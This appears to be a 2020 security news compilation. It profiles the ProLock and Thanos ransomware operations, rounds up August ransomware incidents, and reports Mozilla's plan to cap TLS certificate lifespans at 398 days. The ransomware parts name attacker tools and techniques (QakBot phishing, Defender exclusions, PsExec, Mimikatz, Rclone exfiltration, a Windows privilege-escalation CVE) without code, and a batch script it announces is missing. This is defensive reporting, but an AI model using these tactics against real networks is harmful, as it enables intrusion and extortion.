Prolock Ransomware 🔓 Unlocked

ProLock ransomware were able to deploy a large number of attacks over the past six months, using the standard operating tactic.vaveraging close to one target every day.

Initially started in late 2019, under the name PwndLocker, due to a crypto bug that allowed unlocking the files for free, the operators rebooted the operation with fixing the flaw and renaming the malware to ProLock.

A fresh start in March under the ProLock label also meant increased activity and larger ransoms. Since then, the average figure swelled to $1.8 million.

Simple operation

The threat actor has no preference for its targets or the sector of their activity as long as they are companies with big networks, able to pay a higher ransom. The focus seems to be on businesses in Europe and North America.

The group’s tactics, techniques, and procedures are simple and effective, the partnership with QakBot (QBot) banking trojan allowing them to map the network, move laterally, ultimately deploy the ransomware.

Between the initial compromise and running the file-encryption routine, the actor spends about a month on the network, gathering information for better targeting and exfiltrating data (via Rclone).

Running ProLock on the target network is the last step of the attack, which typically starts with a spear-phishing email containing weaponized VBScripts and Office documents that deliver QakBot, oftentimes via replies in hijacked email threads.

Once on the target host, Qakbot establishes persistence and makes sure that active defenses don’t spot it by modifying Windows Registry to add its binaries on the list of Windows Defender exclusions.

“QakBot also collects a lot of information about the infected host, including the IP address, hostname, domain, and list of installed programs. The threat actor acquires a basic understanding of the network and can plan post-exploitation activities”

With tools like Bloodhound and ADFind, the threat actor profiles the environment to distribute the banking trojan to other hosts on the network. In some cases, this was done manually using PsExec, suggesting a strong connection between ProLock and QakBot operators.

Moving laterally also involved the use of remote desktop (RDP), and when this was not available on a machine, the actor ran the following batch script via PsExec to enable the remote connection:

ProLock’s toolkit includes Mimikatz post-exploitation tool for penetration testers, which is deployed through Cobalt strike software for red team engagements.

The ransomware actor sometimes relies on a vulnerability in Windows (CVE-2019-0859) that enables them to escalate privileges on compromised systems.

The file-encrypting malware lands on the host either via QakBot, downloaded with the Background Intelligent Transfer Service (BITS) from the attacker’s server or by executing a script using Windows Management Instrumentation (WMIC) on a remote host.

Despite using standard tools, ProLock attacks remain largely undetected on the network, giving them time to prepare the file encryption stage and steal data.

Thanos đź’€… A review on Ransomware as a service

Thanos, a Ransomware-as-a-Service (RaaS), was found to be on sale on Russain underground . It is being offered as a private ransomware builder with 43 different configuration options. Recently, the malware added a Windows MBR locker module.

Targeted victims

On July 6 and July 9, 2020, files associated with Thanos ransomware (aka Hakbit) were observed in an attack targeting two state-run organizations located in the Middle East and North Africa.

In June 2020, an email-based ransomware campaign was found targeting organizations located in Western Europe (Austria, Switzerland, and Germany). The attack campaign reportedly leveraged the Thanos builder tool.

Mode of operation

The ransomware is available as a service and offers its users the ability to create custom ransomware payloads.

The ransomware uses a proof of concept ransomware technique called RIPlace, to bypass anti-ransomware mitigations.
For propagation, it uses a legitimate PsExec tool to execute the ransomware on network-connected devices.

Thanos also spreads via common infection vectors, such as social engineering, phishing, and spam emails.

The ransomware builder tool is developed by a threat actor named Nosophoros.
Thanos ransomware builder was promoted as a private ransomware builder offered on Russian-speaking hacker forums since February.

Thanos is also marketed on a profit-sharing basis, as the enlisted hackers and malware distributors receive a revenue share—of about 60-70% of ransom payments—for distributing the ransomware.

Organizations need to be vigilant and must proactively update their anti-malware solutions, take backup of important data, deploy secure email gateway, and network firewalls to block potential threats.

Rainy Ransomware August ! Strom hit

Large-scale breaches have mushroomed in 2020, with an increase of 273% in the first quarter as compared to the previous year. Ransomware is among the most common types of attacks and is up by 90%, as per a recent report

Tricks up their Sleeves

Ransomware operators have started using memory-mapped I/O to encrypt files, making it difficult for behavior-based anti-ransomware solutions to monitor malicious activities.

WastedLocker is using this technique to encrypt cached documents in memory, without causing additional disk I/O, which can shield it from behavior-monitoring software.

Researchers have identified a new element in recent Sodinokibi (REvil) campaigns, wherein they scan compromised networks for PoS software to make additional money from payment information. Attackers might directly use the payment information to strip accounts or sell them on underground forums.

Ransomware Attackers Up the Ante
Allegedly, Maze ransomware operators have infected the network of SK Hynix, the RAM and flash memory supplier, and leaked some of the stolen files on their website as proof of the infiltration, holding the semiconductor giant to ransom.

A ransomware attack targeted the services of SnapFulfil, a cloud-based warehouse management software provider, disrupting warehouse operations for a minimum of one of its customers. The U.K-based company is working with the National Cyber Security Centre (NCSC) and the National Crime Agency (NCA) to restore its systems.

Hackers accessed guest and employee data and encrypted a portion of the IT systems of one of the brands of British-American cruise operator, Carnival, in a ransomware attack.

Netwalker ransomware operators attacked Forsee Power, a lithium-ion battery systems provider, and shared a few screenshots of folders containing sensitive data as evidence of the breach on their online blog.

Brown-Forman, the makers of Jack Daniel’s, lost 1TB of corporate data at the hands of Sodinokibi ransomware. Some of the other firms that fell victim to ransomware attacks this month include Konica Minolta, SPIE group, R1 RCM, Boyce Technologies, LG, Xerox, and Canon.

While many organizations use the conventional signature-based solutions to protect their data, files, and systems, they need to take a more comprehensive approach toward security to address the threats posed by evolving ransomware. Not only endpoint security protects… Defence in depth must be maintained at a granular level to upheld the security.

Mozilla cut is Certificate life Span

Mozilla is planning to complement the change in the coming months, regardless of the outcome of a vote on the issue by a key industry group.

The CA/Browser Forum, which sets policies for certificate authorities and browser makers, has been considering the change for some time and the proposal has significant support among the browser vendors. An updated version of the proposal that would reduce the lifespan of TLS certificates to a maximum of 398 days is active now.

Currently, the policy allows for a maximum lifespan of 825 days, or about 27 months. A lot can change in that amount of time, and that’s one of the main reasons that Mozilla and other companies are supporting the change. TLS certificates serve several purposes, including the enablement of encrypted sessions between clients and the site,

“TLS certificates provide authentication, meaning that you can be sure that you are sending information to the correct server and not to an imposter trying to steal your information. If the owner of the domain changes or the cloud service provider changes, the holder of the TLS certificate’s private key (e.g. the previous owner of the domain or the previous cloud service provider) can impersonate the website until that TLS certificate expires,” Ben Wilson, technical program manager at Mozilla, said in a post detailing the company’s position.

“Keys valid for longer than one year have greater exposure to compromise.”

Long lifespans for TLS certificates can be problematic in a number of ways aside from the potential for impersonation. In order to provide compatibility with various browsers and client systems, certificates support several ciphersuites for encryption and hash algorithms for signatures. That’s all fine until there’s a serious issue with one of the ciphersuites or hask algorithms that necessitates revoking and reissuing certificates. This is a relatively rare occurrence, but when it happens it’s a major disruption for site owners, CAs, and individuals trying to make a secure connection to an affected site.

In recent years, collisions discovered with both  SHA-1 and MD5 hash algorithms put certificates signed with one of those algorithms in jeopardy for forgery. The issues were public, but because of the long lifespans of TLS certificates at the time the collisions were disclosed, it took many years to phase out all of the affected certificates. Reducing the lifespan of certificates would mitigate this kind of problem while also limiting the amount of time a given keypair is valid.

Keys valid for longer than one year have greater exposure to compromise, and a compromised key could enable an attacker to intercept secure communications and/or impersonate a website until the TLS certificate expires. A good security practice is to change key pairs frequently, which should happen when you obtain a new certificate.

The current proposal would have the 398 day lifespan go into effect on Sept. 1 if it passes. But even if the proposal fails,Mozilla intends to change its policy to limit certificate lifespans to 398 days

Recently Apple announced that it will enforce the TLS Policy by September 2020